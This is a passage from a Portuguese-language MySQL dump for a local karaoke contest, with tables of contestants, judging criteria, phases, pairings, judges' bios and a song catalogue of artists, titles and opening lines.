'img-003.jpg', '2016-06-24 21:23:38', 1), (2, 'Daniele Novaes', 28, 'img-002.jpg', '2016-06-24 21:23:38', 1), (3, 'Warley Monteiro', 29, 'img-001.jpg', '2016-06-24 21:23:38', 1), (4, 'Maxwell Machado', 30, 'img-002.jpg', '2016-06-24 21:23:38', 1), (5, 'Werley Monteiro', 34, 'img-003.jpg', '2016-06-24 21:23:38', 1), (6, 'Daniel Machado', 30, 'img-004.jpg', '2016-06-24 21:23:38', 1), (7, 'Marilda Monteiro', 52, 'img-001.jpg', '2016-06-24 21:23:38', 1), (8, 'Muriellen Valeska', 26, 'img-002.jpg', '2016-06-24 21:23:38', 1), (9, 'Adileusa Monteiro', 56, 'img-003.jpg', '2016-06-24 21:23:38', 1), (10, 'Daniel Monteiro', 20, 'img-004.jpg', '2016-06-24 21:23:38', 1), (11, 'Samuel Monteiro', 20, 'img-002.jpg', '2017-03-12 23:57:24', 1), (12, 'Juscelio Dutra', 28, 'img-003.jpg', '2017-03-12 23:57:25', 1), (13, 'Ana Paula', 30, 'img-004.jpg', '2017-03-12 23:57:25', 1), (14, 'Aline Pereira', 26, 'img-001.jpg', '2017-03-12 23:57:25', 1), (15, 'Romildo Rodrigues', 42, 'img-002.jpg', '2017-03-12 23:57:25', 1), (16, 'Kilter Sena', 32, 'img-003.jpg', '2017-03-12 23:57:25', 1), (17, 'Saulo Tinoco', 31, 'img-002.jpg', '2017-03-15 02:13:26', 1), (18, 'Silas Tinoco', 28, 'img-001.jpg', '2017-03-15 02:13:26', 1), (19, 'David Luccas', 20, 'img-004.jpg', '2017-03-15 02:13:27', 1), (20, 'George Luccas', 18, 'img-003.jpg', '2017-03-15 02:13:27', 1), (21, 'Mara Monteiro', 46, 'img-002.jpg', '2017-03-14 23:27:51', 0), (22, 'João Corino', 56, 'img-004.jpg', '2017-03-14 23:27:51', 0); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_criterios` -- CREATE TABLE IF NOT EXISTS `tb_criterios` ( `idCriterios` int(11) NOT NULL AUTO_INCREMENT, `criterio` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `descricao` text COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idCriterios`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=6 ; -- -- Extraindo dados da tabela `tb_criterios` -- INSERT INTO `tb_criterios` (`idCriterios`, `criterio`, `descricao`) VALUES (1, 'VOZ E AFINACAO', 'Tem em conta não só as capacidades vocais do concorrente, mas também o timbre e a forma como coloca a voz a cantar e respectiva afinação.'), (2, 'RITMO E TEMPO', 'Tem em conta a forma como o concorrente coloca a melodia no tempo do tema, ou seja, a marcação correcta (ou não) das frases musicais.'), (3, 'INTERPRETACAO', 'Tem em conta a forma como o concorrente sente e transmite vocalmente o tema que está a interpretar, ou seja, a emoção que transmite na sua atuação.'), (4, 'PRESENCA EM PALCO ', 'Tem em conta a forma como o concorrente se exibe no palco e a sua interacção com a audiência. São aspectos positivos a forma como se movimenta, o olhar para a audiência, os gestos adequados, sempre de acordo com o tema que canta. São aspectos negativos a permanência estática e as mãos nos bolsos.'), (5, 'NOTA DO APARELHO', 'O aparelho utiliza um sistema próprio que analiza alguns dos critérios anteriores e pontua de 0 a 100. Utiliza também um sitema de dificuldade para elevar o grau de pontuação, onde Alto dá uma melhor pontuação, Médio dá uma pontuação mediana e Baixa dá uma pontuação baixa, o que exige que o candidato se esforce mais para poder obter notas altas. O sistema usado nesse torneio será o Baixa.'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_duplas` -- CREATE TABLE IF NOT EXISTS `tb_duplas` ( `idDuplas` int(11) NOT NULL AUTO_INCREMENT, `idFases` int(11) NOT NULL, `idCandidatos` int(11) NOT NULL, `grupo` varchar(1) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idDuplas`), KEY `idFases` (`idFases`,`idCandidatos`), KEY `idCandidatos` (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=11 ; -- -- Extraindo dados da tabela `tb_duplas` -- INSERT INTO `tb_duplas` (`idDuplas`, `idFases`, `idCandidatos`, `grupo`) VALUES (1, 2, 1, 'A'), (2, 2, 17, 'B'), (3, 2, 4, 'A'), (4, 2, 13, 'B'), (5, 2, 2, 'A'), (6, 2, 11, 'B'), (7, 2, 18, 'A'), (8, 2, 5, 'B'), (9, 2, 14, 'A'), (10, 2, 7, 'B'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_fases` -- CREATE TABLE IF NOT EXISTS `tb_fases` ( `idFases` int(11) NOT NULL AUTO_INCREMENT, `nome` varchar(50) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idFases`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=4 ; -- -- Extraindo dados da tabela `tb_fases` -- INSERT INTO `tb_fases` (`idFases`, `nome`) VALUES (1, 'Primeira Fase'), (2, 'Segunda Fase'), (3, 'Terceira Fase - Final'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_final` -- CREATE TABLE IF NOT EXISTS `tb_final` ( `idFinal` int(11) NOT NULL AUTO_INCREMENT, `idFases` int(11) NOT NULL, `idCandidatos` int(11) NOT NULL, `grupo` varchar(1) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idFinal`), KEY `idFases` (`idFases`), KEY `idCandidatos` (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=6 ; -- -- Extraindo dados da tabela `tb_final` -- INSERT INTO `tb_final` (`idFinal`, `idFases`, `idCandidatos`, `grupo`) VALUES (1, 3, 1, 'A'), (2, 3, 13, 'B'), (3, 3, 2, 'A'), (4, 3, 18, 'A'), (5, 3, 7, 'B'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_forma_duplas` -- CREATE TABLE IF NOT EXISTS `tb_forma_duplas` ( `idFormaDuplas` int(11) NOT NULL AUTO_INCREMENT, `idFases` int(1) NOT NULL, `idCandidatos` int(1) NOT NULL, `grupo` varchar(1) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idFormaDuplas`), KEY `idFases` (`idFases`), KEY `idCandidatos` (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=11 ; -- -- Extraindo dados da tabela `tb_forma_duplas` -- INSERT INTO `tb_forma_duplas` (`idFormaDuplas`, `idFases`, `idCandidatos`, `grupo`) VALUES (1, 2, 1, 'A'), (2, 2, 4, 'A'), (3, 2, 2, 'A'), (4, 2, 18, 'A'), (5, 2, 14, 'A'), (6, 2, 7, 'B'), (7, 2, 5, 'B'), (8, 2, 11, 'B'), (9, 2, 13, 'B'), (10, 2, 17, 'B'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_grupos` -- CREATE TABLE IF NOT EXISTS `tb_grupos` ( `idGrupos` int(11) NOT NULL AUTO_INCREMENT, `idCandidatos` int(11) NOT NULL, `grupo` varchar(1) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idGrupos`), KEY `idCandidatos` (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=21 ; -- -- Extraindo dados da tabela `tb_grupos` -- INSERT INTO `tb_grupos` (`idGrupos`, `idCandidatos`, `grupo`) VALUES (1, 14, 'A'), (2, 9, 'A'), (3, 8, 'A'), (4, 18, 'A'), (5, 16, 'A'), (6, 19, 'A'), (7, 3, 'A'), (8, 4, 'A'), (9, 2, 'A'), (10, 1, 'A'), (11, 7, 'B'), (12, 20, 'B'), (13, 17, 'B'), (14, 11, 'B'), (15, 10, 'B'), (16, 5, 'B'), (17, 12, 'B'), (18, 13, 'B'), (19, 15, 'B'), (20, 6, 'B'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_jurados` -- CREATE TABLE IF NOT EXISTS `tb_jurados` ( `idJurados` int(11) NOT NULL AUTO_INCREMENT, `idCriterios` int(11) NOT NULL, `nome` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `biografia` text COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idJurados`), KEY `idCriterios` (`idCriterios`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=5 ; -- -- Extraindo dados da tabela `tb_jurados` -- INSERT INTO `tb_jurados` (`idJurados`, `idCriterios`, `nome`, `biografia`) VALUES (1, 1, 'Vinicius Vieira', 'Timbre e afinação única, Vinicius Vieira é um dos mais experientes músicos da região, conhecido pelo seu estilo musica voltado a MPB.'), (2, 2, 'Daia Tonkeslk', 'Cantora de voz suave e melodia cativante, Daia se apresenta em casas de show da região, com um estilo musical mais voltado para o sertanejo universitário e pop.'), (3, 3, 'Suelton Camara', 'Suelton Câmara é um tradicional fotógrafo e publicitário de Planaltina-GO e já trabalhou com diversos artistas da cidade.'), (4, 4, 'Eli Jhon', 'Excelente músico instrumentista com fortes raízes no forró. Eli Jhon se destacou tocando teclado e accordeon.'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_lista_principal` -- CREATE TABLE IF NOT EXISTS `tb_lista_principal` ( `idListaPrincipal` int(11) NOT NULL AUTO_INCREMENT, `interprete` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `codigo` int(11) NOT NULL, `titulo` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `inicio` varchar(255) COLLATE utf8_unicode_ci NOT NULL, `idioma` varchar(50) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idListaPrincipal`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=1563 ; -- -- Extraindo dados da tabela `tb_lista_principal` -- INSERT INTO `tb_lista_principal` (`idListaPrincipal`, `interprete`, `codigo`, `titulo`, `inicio`, `idioma`) VALUES (1, 'Paula Fernandes-Almir Sater', 1145, 'JEITO DE MATO', 'De onde é que vem esses olhos', 'BRA'), (2, 'Fernando e Sorocaba', 1495, 'MADRI', 'Que saudade amor estou sabendo que aí', 'BRA'), (3, 'Alexandre Pires', 1532, 'MULHER DAS ESTRELAS', 'Ela canta demais ela sabe o que diz', 'BRA'), (4, 'Alexandre Pires', 1558, 'LEVE TUDO COM VOCÊ', 'Como pude mentir o meu bem eu traí', 'BRA'), (5, 'Zezé Di Camargo e Luciano', 1658, 'MENTES TÃO BEM', 'Me promete amor sincero uma vida in', 'BRA'), (6, 'Luan Santana', 1832, 'AMAR NÃO É PECADO', 'Eu não sei', 'BRA'), (7, 'Paula Fernandes-Víctor e Léo', 1837, 'NÃO PRECISA', 'Você diz que não precisa', 'BRA'), (8, 'Charlie Brown Jr.', 2846, 'CÉU AZUL', 'Tão natural quanto a luz do dia', 'BRA'), (9, 'Roberto Carlos', 2865, 'ESSE CARA SOU EU', 'O cara que pensa em você toda hora', 'BRA'), (10, 'Erasmo Carlos-Renato Russo', 2881, 'A CARTA', 'Escrevo-te estas mal traçadas linhas', 'BRA'), (11, 'Jorge Benjor', 3001, 'A BANDA DO ZÉ PRETINHO', 'A banda do Zé Pretinho chegou...', 'BRA'), (12, 'Kid Abelha', 3002, 'A FÓRMULA DO AMOR', 'Eu tenho gestos aptos sei...', 'BRA'), (13, 'Ronnie Von', 3003, 'A PRAÇA', 'Hoje eu acordei com saudades de você', 'BRA'), (14, 'Royce do Cavaco', 3004, 'A SAUDADE DÓI', 'Não ligue pro que aconteceu', 'BRA'), (15, 'Roupa Nova', 3005, 'A VIAGEM', 'Há tanto tempo que eu deixei você', 'BRA'), (16, 'Elis Regina', 3006, 'ÁGUAS DE MARÇO', 'É pau é pedra é o fim do cami...', 'BRA'), (17, 'Ataulfo Alves', 3007, 'AI! QUE SAUDADE DA AMÉLIA', 'Nunca vi fazer tanta exigência', 'BRA'), (18, 'Marina Lima', 3008, 'AINDA É CEDO', 'Uma menina me ensinou', 'BRA'), (19, 'Marisa Monte', 3009, 'AINDA LEMBRO', 'Ainda lembro o que passou', 'BRA'), (20, 'Peri Ribeiro', 3010, 'ALGUÉM COMO TU', 'Alguém como tu', 'BRA'), (21, 'Fábio Jr.', 3011, 'ALMA GÊMEA', 'Por você eu tenho feito e faço tudo', 'BRA'), (22, 'Roberto Carlos', 3012, 'AMADA AMANTE', 'Esse amor demais antigo', 'BRA'), (23, 'Netinho', 3013, 'AMOR CALIENTE', 'Convidei-a para dançar', 'BRA'), (24, 'Severino Araújo', 3014, 'ANOS DOURADOS', 'Parece que dizes te amo Maria', 'BRA'), (25, 'Belchior', 3015, 'APENAS UM RAPAZ LATINO AMERICANO', 'Eu sou apenas um rapaz', 'BRA'), (26, 'Gal Costa', 3016, 'AQUARELA DO BRASIL', 'Brasil meu Brasil brasileiro...', 'BRA'), (27, 'Ara Ketu', 3017, 'ARA KETU BOM DEMAIS', 'Não dá pra esconder', 'BRA'), (28, 'Cartola', 3018, 'AS ROSAS NÃO FALAM', 'Bate outra vez com esperanças', 'BRA'), (29, 'Luiz Gonzaga', 3019, 'ASA BRANCA', 'Quando olhei a terra ardendo', 'BRA'), (30, 'Zizi Possi', 3020, 'ASA MORENA', 'Me faz pequena asa morena', 'BRA'), (31, 'Lulu Santos', 3021, 'ASSIM CAMINHA A HUMANIDADE', 'Ainda vai levar um tempo', 'BRA'), (32, 'Ataulfo Alves', 3022, 'ATIRE A PRIMEIRA PEDRA', 'Covarde sei que me podem chamar', 'BRA'), (33, 'Banda Mel', 3023, 'BAIANIDADE NAGÔ', 'Êh ôh êh ôh laiá... Já pintou verão calor no', 'BRA'), (34, 'Gal Costa', 3024, 'BALANCÊ', 'Oh balancê balancê quero...', 'BRA'), (35, 'Rita Lee', 3025, 'BANHO DE ESPUMA', 'Que tal nós dois numa banheira', 'BRA'), (36, 'Celly Campello', 3026, 'BANHO DE LUA', 'Tomo um banho de lua fico branca com', 'BRA'), (37, 'Elba Ramalho', 3027, 'BATE CORAÇÃO', 'Bate bate bate coração', 'BRA'), (38, 'Banda Mel', 3028, 'BATEU SAUDADE', 'Jura jura que me dá o seu amor', 'BRA'), (39, 'Negritude Júnior', 3029, 'BEIJO GELADINHO', 'Tô te vendo tô sentindo...', 'BRA'), (40, 'Marisa Monte', 3030, 'BEM QUE SE QUIS', 'Bem que se quis depois de tudo ainda ser', 'BRA'), (41, 'Mariane', 3031, 'BERIMBOLANDO O PÁ-DE-DÊ', 'Atirei o pau no gato mas não sei', 'BRA'), (42, 'Ed Wilson', 3032, 'BIQUINI DE BOLINHA AMARELINHA', 'Ana Maria entrou na cabine', 'BRA'), (43, 'Moraes Moreira', 3033, 'BRASIL PANDEIRO', 'Chegou a hora dessa gente bronzeada', 'BRA'), (44, 'Xuxa', 3034, 'BRINCAR DE ÍNDIO', 'Ôh ôh ôh ôh... Vamos brincar de índio mas', 'BRA'), (45, 'Chitãozinho e Xororó', 3035, 'BRINCAR DE SER FELIZ', 'Tranquei a porta do meu peito', 'BRA'), (46, 'Fábio Jr.', 3036, 'CAÇA E CAÇADOR', 'Você pintou como um sonho', 'BRA'), (47, 'Molejo', 3037, 'CAÇAMBA', 'Traz a caçamba traz a caçamba', 'BRA'), (48, 'Leandro e Leonardo', 3038, 'CADÊ VOCÊ', 'O tempo vai o tempo vem a...', 'BRA'), (49, 'Milton Nascimento', 3039, 'CANÇÃO DA AMÉRICA', 'Amigo é coisa pra se guardar', 'BRA'), (50, 'Netinho', 3040, 'CAPRICHO DOS DEUSES', 'Numa noite de lua ah uma...', 'BRA'), (51, 'Rita Lee', 3041, 'CASO SÉRIO', 'Eu fico pensando em nós dois', 'BRA'), (52, 'Zélia Duncan', 3042, 'CATEDRAL', 'O deserto que atravessei', 'BRA'), (53, 'Larissa e William', 3043, 'CAVALEIROS DO ZODÍACO', 'Tem sempre alguém no...', 'BRA'), (54, 'Música Junina', 3044, 'CHEGOU A HORA DA FOGUEIRA', 'Chegou a hora da fogueira', 'BRA'), (55, 'Guilherme Arantes', 3045, 'CHEIA DE CHARME', 'Quando a vi logo ali tão perto...', 'BRA'), (56, 'Raça Negra', 3046, 'CHEIA DE MANIAS', 'Cheia de manias toda dengosa', 'BRA'), (57, 'Mamonas Assassinas', 3047, 'CHOPIS CENTIS', 'Eu di um beijo nela', 'BRA'), (58, 'Jorge Benjor', 3048, 'CHOVE CHUVA', 'Chove chuva chove sem parar...', 'BRA'), (59, 'Raça Negra', 3049, 'CIÚME DE VOCÊ', 'Se você demora mais um pouco eu fico louco', 'BRA'), (60, 'Roberto Carlos', 3050, 'COISA BONITA', 'Amo você assim e não sei pra que', 'BRA'), (61, 'Gonzaguinha', 3051, 'COMEÇARIA TUDO OUTRA VEZ', 'Começaria tudo outra vez...', 'BRA'), (62, 'Lulu Santos', 3052, 'COMO UMA ONDA', 'Nada do que foi será', 'BRA'), (63, 'Netinho', 3053, 'COMO?', 'Como vou deixar você', 'BRA'), (64, 'Dick Farney', 3054, 'COPACABANA', 'Existem praias tão lindas ...', 'BRA'), (65, 'Sérgio Reis', 3055, 'CORAÇÃO DE PAPEL', 'Se você pensa que meu coração...', 'BRA'), (66, 'Zezé Di Camargo e Luciano', 3056, 'CORAÇÃO ESTÁ EM PEDAÇOS', 'Hoje eu vim te procurar a saudade', 'BRA'), (67, 'Lulu Santos', 3057, 'DE REPENTE CALIFÓRNIA', 'Garota eu vou pra Califórnia', 'BRA'), (68, 'Leny Andrade', 3058, 'DEIXA', 'Deixa fale quem quiser falar meu bem deixa', 'BRA'), (69, 'Guilherme Arantes', 3059, 'DEIXA CHOVER', 'Certos dias de chuva...', 'BRA'), (70, 'Alcione', 3060, 'DELÍRIO DO AMOR (CHAMEGO)', 'Você acaba dando um jeito', 'BRA'), (71, 'Rita Lee', 3061, 'DESCULPE O AUÊ', 'Desculpe o auê', 'BRA'), (72, 'Leandro e Leonardo', 3062, 'DESCULPE, MAS EU VOU CHORAR', 'As luzes da cidade acesas...', 'BRA'), (73, 'Roberto Carlos', 3063, 'DETALHES', 'Não adianta nem tentar', 'BRA'), (74, 'Elba Ramalho', 3064, 'DO JEITO QUE A GENTE GOSTA', 'Cai cai morena no fuá que ainda é ce', 'BRA'), (75, 'Rita Lee', 3065, 'DOCE VAMPIRO', 'Venha me beijar meu doce vampiro', 'BRA'), (76, 'Só Pra Contrariar', 3066, 'DÓI DEMAIS', 'Tá doendo sim tá doendo em mim', 'BRA'), (77, 'Elis Regina', 3067, 'DOIS PRA LÁ DOIS PRA CÁ', 'Sentindo frio em minha''lma', 'BRA'), (78, 'Roupa Nova', 3068, 'DONA', 'Dona desses traiçoeiros', 'BRA'), (79, 'Trem da Alegria', 3069, 'É DE CHOCOLATE', 'Por detrás do arco íris além do horizonte', 'BRA'), (80, 'Caetano Veloso', 3070, 'É HOJE', 'A minha alegria atravessou o mar', 'BRA'), (81, 'Zezé Di Camargo e Luciano', 3071, 'É O AMOR', 'Eu não vou negar que sou louco por você', 'BRA'), (82, 'Raça Negra', 3072, 'É TARDE DEMAIS', 'Olha só você depois de me perder', 'BRA'), (83, 'Kid Abelha', 3073, 'EDUCAÇÃO SENTIMENTAL II', 'A vida que me ensinaram...', 'BRA'), (84, 'Roberto Carlos', 3074, 'EMOÇÕES', 'Quando eu estou aqui', 'BRA'), (85, 'Engenheiros do Hawaí', 3075, 'ERA UM GAROTO QUE COMO EU', 'Era um garoto que como eu', 'BRA'), (86, 'Tetê Espíndola', 3076, 'ESCRITO NAS ESTRELAS', 'Você pra mim foi o sol', 'BRA'), (87, 'Skank', 3077, 'ESMOLA', 'Uma esmola pelo amor de Deus', 'BRA'), (88, 'Sá e Guarabyra', 3078, 'ESPANHOLA', 'Por tantas vezes eu andei mentindo', 'BRA'), (89, 'Patrícia Marx', 3079, 'ESPELHO D''ÁGUA', 'Hum seus olhos são espelhos d''água', 'BRA'), (90, 'Roberto Carlos', 3080, 'ESQUEÇA (FORGET HIM)', 'Esqueça se ele não te ama', 'BRA'), (91, 'Só Pra Contrariar', 3081, 'ESSA TAL LIBERDADE', 'O que é que eu vou fazer com essa tal', 'BRA'), (92, 'Lupicínio Rodrigues', 3082, 'ESSES MOÇOS', 'Estes moços pobres moços', 'BRA'), (93, 'Raça Negra', 3083, 'ESTOU MAL', 'Eu pensei que fosse fácil te esquecer', 'BRA'), (94, 'Banda Cheiro de Amor', 3084, 'ESTRELA PRIMEIRA', 'É luz do meu ser a fonte mais pura do viver', 'BRA'), (95, 'Celly Campello', 3085, 'ESTÚPIDO CUPIDO', 'Oh oh cupido vê se deixa em paz', 'BRA'), (96, 'Grupo Raça', 3086, 'EU E ELA', 'Numa linda noite bela saímos...', 'BRA'), (97, 'Roberto Carlos', 3087, 'EU E ELA', 'Um grande amor começa agora', 'BRA'), (98, 'Razão Brasileira', 3088, 'EU MENTI', 'Eu menti quando disse que não te queria', 'BRA'), (99, 'Raul Seixas', 3089, 'EU NASCI HÁ DEZ MIL ANOS ATRÁS', 'Um dia numa rua da cidade eu vi um', 'BRA'), (100, 'Legião Urbana', 3090, 'EU SEI', 'Sexo verbal não faz meu...', 'BRA'), (101, 'Dominguinhos', 3091, 'EU SÓ QUERO UM XODÓ', 'A sa ca po re iê mo dum ô hô ma bê', 'BRA'), (102, 'Zezé Di Camargo e Luciano', 3092, 'EU TE AMO (AND I LOVE HER)', 'Foi tanto que eu te amei', 'BRA'), (103, 'Banda Brasil', 3093, 'EU TE AMO, TE AMO, TE AMO', 'Tanto tempo longe de você', 'BRA'), (104, 'Chitãozinho e Xororó', 3094, 'EVIDÊNCIAS', 'Quando eu digo que deixei de te amar', 'BRA'), (105, 'Cazuza', 3095, 'EXAGERADO', 'Amor da minha vida', 'BRA'), (106, 'Maria Bethânia', 3096, 'EXPLODE CORAÇÃO', 'Chega de tentar dissimular e disfarça', 'BRA'), (107, 'Guilherme Arantes', 3097, 'ÊXTASE', 'Eu nem sonhava te amar...', 'BRA'), (108, 'Leandro e Leonardo', 3098, 'FAZ MAIS UMA VEZ COMIGO', 'Não paro de rolar na cama...', 'BRA'), (109, 'Cazuza', 3099, 'FAZ PARTE DO MEU SHOW', 'Te pego na escola e encho a tua bola', 'BRA'), (110, 'Xuxa', 3100, 'FESTA DO ESTICA E PUXA', 'E todos dançam pega estica e puxa', 'BRA'), (111, 'Gal Costa', 3101, 'FESTA DO INTERIOR', 'Fagulhas pontas de agulhas...', 'BRA'), (112, 'Chitãozinho e Xororó', 3102, 'FIO DE CABELO', 'Quando a gente ama qualquer coisa ser', 'BRA'), (113, 'Rita Lee', 3103, 'FLAGRA', 'Xá xap xap xa á... No escurinho do cinema', 'BRA'), (114, 'Djavan', 3104, 'FLOR DE LIZ', 'Valei-me Deus é o fim do nosso amor', 'BRA'), (115, 'Wando', 3105, 'FOGO E PAIXÃO', 'Você é luz é raio estrela e luar manhã de sol', 'BRA'), (116, 'Elba Ramalho', 3106, 'FOLIA BRASILEIRA', 'Tem que ter molejo meu bem', 'BRA'), (117, 'Royce do Cavaco', 3107, 'FRENTE À FRENTE', 'A gente se enganou pensando que era', 'BRA'), (118, 'Marina Lima', 3108, 'FULLGÁS', 'Meu mundo você é quem faz', 'BRA'), (119, 'Os Cariocas', 3109, 'GAROTA DE IPANEMA', 'Olha que coisa mais linda', 'BRA'), (120, 'Tim Maia', 3110, 'GOSTAVA TANTO DE VOCÊ', 'Não sei por que você se foi', 'BRA'), (121, 'Maria Bethânia', 3111, 'GOSTOSO DEMAIS', 'Tô com saudade de tu meu desejo', 'BRA'), (122, 'Legião Urbana', 3112, 'HÁ TEMPOS', 'Parece cocaína mas é só...', 'BRA'), (123, 'Hino do Corinthians', 3113, 'HINO DO CORINTHIANS', 'Salve o Corinthians...', 'BRA'), (124, 'Ney Matogrosso', 3114, 'HOMEM COM "H"', 'Nunca vi rastro de cobra', 'BRA'), (125, 'Xuxa', 3115, 'ILARIÊ', 'Tá na hora tá na hora', 'BRA'), (126, 'Negritude Júnior', 3116, 'INDIFERENÇA', 'A gente já não fala mais...', 'BRA'), (127, 'Grupo Pirraça', 3117, 'INIGUALÁVEL PAIXÃO', 'És inigualável na arte de amar...', 'BRA'), (128, 'Dominguinhos', 3118, 'ISSO AQUI TÁ BOM DEMAIS', 'Olha isso aqui tá muito bom', 'BRA'), (129, 'Skank', 3119, 'JACKIE TEQUILA', 'Funk lá no morro da mangueira', 'BRA'), (130, 'Raça Negra', 3120, 'JEITO FELINO', 'Só de pensar que sua boca', 'BRA'), (131, 'Elba Ramalho', 3121, 'JOGO DE CINTURA', 'Você tem que ter jogo de cintura', 'BRA'), (132, 'Cravo e Canela', 3122, 'LÁ VEM NEGÃO', 'Lá vem o negão cheio de paixão', 'BRA'), (133, 'Mamonas Assassinas', 3123, 'LÁ VEM O ALEMÃO', 'Só de pensar que nós dois éramos dois', 'BRA'), (134, 'Rita Lee', 3124, 'LANÇA PERFUME', 'Lança menina lança todo esse perfume', 'BRA'), (135, 'Guilherme Arantes', 3125, 'LANCE LEGAL', 'Caminhar ao seu lado...', 'BRA'), (136, 'Hino do Santos', 3126, 'HINO DO SANTOS (LEÃO DO MAR)', 'Santos Santos Gol...', 'BRA'), (137, 'Fagner', 3127, 'LEMBRANÇAS DE UM BEIJO', 'Quando a saudade invade o ...', 'BRA'), (138, 'Emílio Santiago', 3128, 'LESÕES CORPORAIS', 'Nós dois já não somos os mesmos não dá', 'BRA'), (139, 'Pirlimpimpim', 3129, 'LINDO BALÃO AZUL', 'Eu vivo sempre no mundo da lua', 'BRA'), (140, 'Djavan', 3130, 'LINHA DO EQUADOR', 'Luz das estrelas laço do infinito', 'BRA'), (141, 'Elis Regina', 3131, 'MADALENA', 'Oh Madalena o meu peito percebeu que o mar', 'BRA'), (142, 'Blitz', 3132, 'MAIS UMA DE AMOR', 'Perdi meu amor no paraíso', 'BRA'), (143, 'Raul Seixas', 3133, 'MALUCO BELEZA', 'Enquanto você se esforça pra ser', 'BRA'), (144, 'Wilson Simonal', 3134, 'MAMÃE PASSOU AÇÚCAR EM MIM', 'Eu sei que tenho muitos garotos', 'BRA'), (145, 'Rita Lee', 3135, 'MANIA DE VOCÊ', 'Meu bem você me dá água na boca', 'BRA'), (146, 'Ed Motta', 3136, 'MANUEL', 'Manuel foi pro céu Manuel foi pro céu', 'BRA'), (147, 'Raça Negra', 3137, 'MARAVILHA', 'Foi bom te encontrar foi bom te', 'BRA'), (148, 'Sem Compromisso', 3138, 'MARIANA, PARTE MINHA', 'Se eu beijar a sua boca', 'BRA'), (149, 'Dick Farney', 3139, 'MARINA', 'Marina morena Marina você se pintou', 'BRA'), (150, 'Os Morenos', 3140, 'MARROM BOM BOM', 'A gente tem tudo pra dar certo', 'BRA'), (151, 'Emílio Santiago', 3141, 'MASCARADO', 'Vejo agora este teu lindo ...', 'BRA'), (152, 'Jamelão', 3142, 'MATRIZ OU FILIAL', 'Quem sou eu pra ter direitos...', 'BRA'), (153, 'Lobão', 3143, 'ME CHAMA', 'Chove lá fora e aqui', 'BRA'), (154, 'Latino', 3144, 'ME LEVA', 'Moça eu não sei mais o que...', 'BRA'), (155, 'Copacabana Beat', 3145, 'ME LEVA CONTIGO', 'Baby fala comigo diz se eu...', 'BRA'), (156, 'Raça Negra', 3146, 'ME LEVA JUNTO COM VOCÊ', 'No mel do seu beijo tem o gosto do', 'BRA'), (157, 'Raul Seixas', 3147, 'MEDO DA CHUVA', 'É pena que você pense que eu sou seu', 'BRA'), (158, 'Copacabana Beat', 3148, 'MEL DA SUA BOCA', 'Como é doce o beijo quando', 'BRA'), (159, 'Paralamas do Sucesso', 3149, 'MELÔ DO MARINHEIRO', 'Sabe de uma coisa rapaz', 'BRA'), (160, 'Gera Samba', 3150, 'MELÔ DO TCHAN', 'Pau que nasce torto nunca se endireita', 'BRA'), (161, 'Fafá de Belém', 3151, 'MEMÓRIAS', 'Você foi a maior das minhas amarguras', 'BRA'), (162, 'Netinho', 3152, 'MENINA', 'Menina que um dia eu conheci criança', 'BRA'), (163, 'Beto Barbosa', 3153, 'MEU AMOR NÃO VÁ EMBORA', 'Meu amor não vá embora não', 'BRA'), (164, 'Djavan', 3154, 'MEU BEM QUERER', 'Meu bem querer é segredo é sagrado', 'BRA'), (165, 'Paralamas do Sucesso', 3155, 'MEU ERRO', 'Eu quis dizer você não quis escutar', 'BRA'), (166, 'Guilherme Arantes', 3156, 'MEU MUNDO E NADA MAIS', 'Quando eu fui ferido vi tudo...', 'BRA'), (167, 'Joanna', 3157, 'MEU PRIMEIRO AMOR', 'Saudade palavra triste...', 'BRA'), (168, 'Mastruz Com Leite', 3158, 'MEU VAQUEIRO MEU PEÃO', 'Lá vem montado em seu alazão', 'BRA'), (169, 'Erasmo Carlos', 3159, 'MINHA FAMA DE MAU', 'Meu bem às vezes diz', 'BRA'), (170, 'Wando', 3160, 'MOÇA', 'Moça me espere amanhã', 'BRA'), (171, 'Wando', 3161, 'MORDIDA NA MAÇÃ', 'Eu queria me esconder um dia desses', 'BRA'), (172, 'Zezé Di Camargo e Luciano', 3162, 'MUDA DE VIDA', 'Não sei aonde eu ando com a cabeça', 'BRA'), (173, 'Dalto', 3163, 'MUITO ESTRANHO', 'Hum mas se um dia eu chegar muito estranho', 'BRA'), (174, 'Roberto Carlos', 3164, 'MULHER PEQUENA', 'Quando uma mulher pequena', 'BRA'), (175, 'Capital Inicial', 3165, 'MÚSICA URBANA', 'Contra todos contra ninguém', 'BRA'), (176, 'Kid Abelha', 3166, 'NADA POR MIM', 'Você me tem fácil de mais...', 'BRA'), (177, 'Latino', 